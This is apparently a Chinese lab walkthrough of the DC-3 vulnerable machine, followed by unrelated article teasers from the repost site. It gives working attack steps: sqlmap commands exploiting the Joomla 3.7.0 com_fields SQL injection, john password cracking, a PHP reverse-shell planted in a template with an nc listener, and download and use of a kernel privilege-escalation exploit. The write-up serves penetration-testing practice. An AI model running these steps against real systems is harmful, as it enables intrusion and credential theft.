DC-3靶机打靶练习!!!!

先开始还是老样子我的思路:

外网渗透

信息收集

我们在发现了靶机的ip以及靶机开放了80端口,然后收集到了cms

然后去访问页面发现了是有登录口的,win10虚拟机进行后台目录扫描,主机进行弱口令爆破,kali在使用msf模块进行cms的操作

扫描到了后台的登录口

然后我的kali那边的操作也是没有成功的,密码的爆破也没有出来

使用了一些模块,都没有拿下权限。

使用专业的工具来做,毕竟专业的事交给专业是人做

joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具

也是扫描出来了一些信息      主要是扫描到了版本。

然后使用kali自带的信息库来进行找这个版本存在的漏洞

searchsploit joomla 3.7.0

然后我们就可以去这个漏洞信息中去看看,得到了sql注入的注入点

具体的路径/usr/share/exploitdb/exploits/php/webapps/42033.txt

去查看漏洞信息得到了,然后直接sqlmap开跑起来

sqlmap操作

跑数据库

python sqlmap.py -u "http://192.168.163.170/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --batch --dbs

后面就我就写到下面

跑表名里面的列名的时候要注意

表名含有特殊符号,需要用引号包括
这里就不能用--batch参数了,会默认使用公共参数爆破给N掉,导致注入失败,根据提示,手工输入y并回车即可

跑表名

python sqlmap.py sqlmap -u "http://192.168.163.170/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --batch -D joomladb --tables

跑列名

python sqlmap.py sqlmap -u "http://192.168.163.170/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D "jooml
adb" -T "#__users" --columns

跑数据

python sqlmap.py -u "http://192.168.163.170//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" -C "username,password" --dump

然后我们在进行使用工具来进行解密的操作,因为我们不知道他加密的函数是什么所以只能暴力破解。

可以使用kali内的john 解密

因为我前面是破解过的,所以说我直接在这个文件里面可以查看我破解的密码

如果你们是第一次  就创建一个文件里面放要破解的密文  就行了

john 对应的路径

这个文件会保存我们破解过的密码 john.pot文件

我是查看到的   find / -name john.pot

内网渗透:

后台主机上线:

然后进行登录后台

使用前面的账号和密码进入后台

然后登录到后台看看后台哪些的功能点可以使用,我们最后找到了上传文件的地方,但是好像上传文件被过滤了,我们可以先创建一个文件,然后在给文件里面写入我们的反弹shell代码。

我是创建好了的。然后把我的代码进行保存操作,ip和端口,在网上找一个脚本就行了。

我们可以使用nc来接受,但是还是可以使用cs来接受都可以。

然后就到kail上面执行nc -lvvp 端口就行了

保存就上传好啦,再根据joomla的特性,模块会单独放在一个文件夹里/templates/
而protostar模块就在/templates/protostar/里面,刚才创建的webshell路径为
http://192.168.163.170/templates/protostar/webshell.php  
然后我们可以使用最简单上线  就是nc -lvvp 进行上线的操作

先进行监听然后在去访问路径触发就行了

然后要有交互的getshell跟dc-1的是一样的
python -c 'import pty; pty.spawn("/bin/bash")'

如果python这个不行我们可以换其他的,在那个时候在进行更换。

liunx权限提升

然后我们在看一下,我发现suid提权都不行,只能看看漏洞提权了。

这个find提权失败

我先查看版本  使用命令  tac /etc/issue

还是使用kali本地的来看有没有漏洞

searchsploit Ubuntu 16.04

一个一个的尝试然后发现 39772.txt可以提权成功

去进行下载exp  这个跟上面一样的先访问漏洞信息发现有exp的下载路径

然后我使用命令进行了下载 

​
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip ​

下载到本地(可以先进行解压第一次解压),但是不要解压那个带有我们执行文件的文件夹

要不然你上传到靶机利用不了,我们也知道,liunx要自己编译文件那些才可以利用。

然后我去刚刚后台的地方上传文件,发现上传不上去,我们就可以让他自己来下载我们的

先开启我们的http功能

然后在去访问

这样我们就可以使用命令让靶机来下载我们的文件

下载过后我们在进行解压

tar -xvf exploit.tar

然后在切换到那个目录进行执行那2个文件就行了。

这样就完成了,然后找到了flag的文件,读取就打完了这个靶场。

读取flag文件

总结一下:

  1. 明白使用joomscan工具来获取漏洞:joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具
  2. kali自带的漏洞库:searchsploit
  3. 找文件的命令  find / -name *falg*
  4. john的密码暴力破解以及破解成功存放的位置 /root/.john/john.pot文件
  5. 巩固了交互shell : python -c 'import pty; pty.spawn("/bin/bash")' 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/397012.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Basic‘ attribute type should not be a container解决方法

在使用Spring Data JPA的时候,实体类中定义一个用List修饰的成员ip,IDEA会提示Basic‘ attribute type should not be a container错误,导致编译不通过。 查阅一些博客和文档说是Spring Data JPA这个框架会把实体类的属性当做是MySQL数据库中…

sql实战

这里写自定义目录标题 sql实战cmseasy daiqile全局污染 RCE限制16字符传入参数限制传入字符7个限制35字符,并过滤所有英文数字 sql实战 cmseasy 1、/lib/admin/admin.php和/lib/admin/tool/front_class.php源代码中发现,可以伪造IP并且传入ishtml1&…

操作符详解(内含二进制与原、反、补码知识点)--还有超详细图解!一看就会!

前言 今天给大家分享一下C语言操作符的详解,但在此之前先铺垫一下二进制和进制转换与原码、反码、补码的知识点,都有详细的图解,也希望这篇文章能对大家有所帮助,大家多多支持呀! 目录 前言 一、二进制和进制转换 1…

虚拟dom-Diff算法

虚拟dom-Diff算法 vue2 diff算法在vue2中就是patch,通过新旧虚拟dom对比,找到最小变化然后进行dom操作 在页面首次渲染的时候会调用一次patch并创建新的vnode,不会进行深层次的比较,然后再组件中数据发生变化的时候,…

QT事件。

目录 事件 鼠标事件 mousePressEvnet mouseMoveEvent 事件过滤 定时器事件 事件 事件分配机制:当某个事件(鼠标、键盘)发生的时候,窗口就会收到这个事件,并且调用相应的事件处理函数,事件处理函数的命名都是以Event结尾的&…

总线学习6--I2C(EEPROM)

鉴于I2C的项目还是很多,所以又多做了一个试验。 1 环境说明 主控还是树莓派Pico。eeprom用的是之前买的AT24C02。 软件环境还是老朋友micropython。 接线是这样接的。 24C02 PinPico PinVCC3.3VGNDGNDSDAGP16SCLGP17 2 代码 代码如下: from machine …

[Python学习日记-5] Python中的注释

[Python学习日记-5] Python中的注释 简介 注释的示例和使用说明 代码注释原则 简介 随着学习的深入。用不了多久,你就可以写上千甚至上万行的复杂代码啦,有些代码你花了很久写出来,但过了些天再回去看,发现竟然看不懂了&#x…

【wsl】wsl + vscode 中使用 typora 打开 markdown 文件

vscode 连接好wsl 使用Open in External App 一个五星好评的插件Open in External App则可以在vscode中用typora打开md文件,不仅如此,还有设定其他应用打开相应的文件,比如chrome打开html。插件食用方法也比较简单,安装后&#…

Linux 软件编程学习第十一天

1.管道: 进程间通信最简单的形式 2.信号: 内核层和用户层通信的一种方式 1.信号类型: 1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 1…

gitea docker 快捷安装部署

前言 在前一篇博文(什么是 Gitea?)中,我们详细介绍了gitea的功能特性,以及其与其它git服务器之间的特性多维度对比。 在本文中,我们将详细介绍gitea的快捷安装部署,docker方式! 1…

Linux磁盘管理与文件系统(二):实用工具和命令、fdisk分区示例

文章目录 4、查看或管理磁盘分区-fdisk格式选项示例 4、示例:使用 fdisk 命令创建分区需求操作步骤 5、创建文件系统-mkfs格式常用选项示例创建其他类型的文件系统 6、创建文件系统-mkswap格式常用选项示例拓展:关闭和启用交换分区拓展:swap分…

Visual Studio Code搭建VUE开发环境

Vue.js 是一款易学易用,性能出色,适用场景丰富的 Web 前端框架。它基于标准 HTML、CSS 和 JavaScript 构建,提供容易上手的 API 和一流的文档。可以用来开启PC网页、移动端网页页面、小程序等等 实验环境 VS Code 1.88.1Node 20.16.0Vue3.2…

趋动科技联合超聚变,让超融合彻底释放算力潜能

近日,趋动科技联合超聚变推出基于FusionOne HCI超融合的AI算力资源池化解决方案。该方案基于业内领先的AI算力资源池化技术,实现智能调度、异构算力融合管理等功能,让客户能够低成本获取AI算力,便捷使用AI算力,加速AI业…

AI学习记录 - transformer的Embedding层

创作不易,免费的赞 前面有介绍了GPT2如何进行token化的过程,现在讲下transformer的Embedding层 Embedding层就是一个巨大的矩阵,边长分别是词汇表长度和词向量维度,矩阵里面的每一个数字都是一个随机初始化的,或者是…

TinyWebserver的复现与改进(1):服务器环境的搭建与测试

计划开一个新坑, 主要是复现qinguoyi/TinyWebServer项目,并且使用其它模块提升性能。 本文开发服务器配置:腾讯云轻量级服务器,CPU - 2核 内存 - 2GB,操作系统 Ubuntu Server 18.04.1 LTS 64bit 打开端口 需要打开服务器3306、80…

常见硬件工程师面试题(四)

大家好,我是山羊君Goat。 对于硬件工程师,学习的东西主要和电路硬件相关,所以在硬件工程师的面试中,对于经验是十分看重的,像PCB设计,电路设计原理,模拟电路,数字电路等等相关的知识…

DriftingBlues2靶机渗透测试

DriftingBlues2靶机 文章目录 DriftingBlues2靶机信息收集FTP渗透web渗透权限提升靶机总结 信息收集 nmap扫描得到21,22和80端口,其中21ftp协议可以使用匿名用户登录 使用目录扫描一下网站,得到了blog目录 FTP渗透 匿名用户登录进去,发现…

WPF篇(8)- Button按钮

1. 用法解析 Button因为继承了ButtonBase&#xff0c;而ButtonBase又继承了ContentControl&#xff0c;所以&#xff0c;Button可以通过设置Content属性来设置要显示的内容。例如 <Button Content"确定"/>我们使用Button的时机&#xff0c;通常是鼠标点击事件…

补录:day023-回溯法

40.组合II 给定一个候选人编号的集合 candidates 和一个目标数 target &#xff0c;找出 candidates 中所有可以使数字和为 target 的组合。 candidates 中的每个数字在每个组合中只能使用 一次 。 注意&#xff1a;解集不能包含重复的组合。 思路:组合题目二&#xff0c;这个题…

2024世界机器人大会将于8月21日至25日在京举行

2024年的世界机器人大会预定于8月21日至25日&#xff0c;在北京经济技术开发区的北人亦创国际会展中心隆重举办。 本届大会以“共育新质生产力 共享智能新未来”为核心主题&#xff0c;将汇聚来自全球超过300位的机器人行业专家、国际组织代表、杰出科学家以及企业家&#xff0…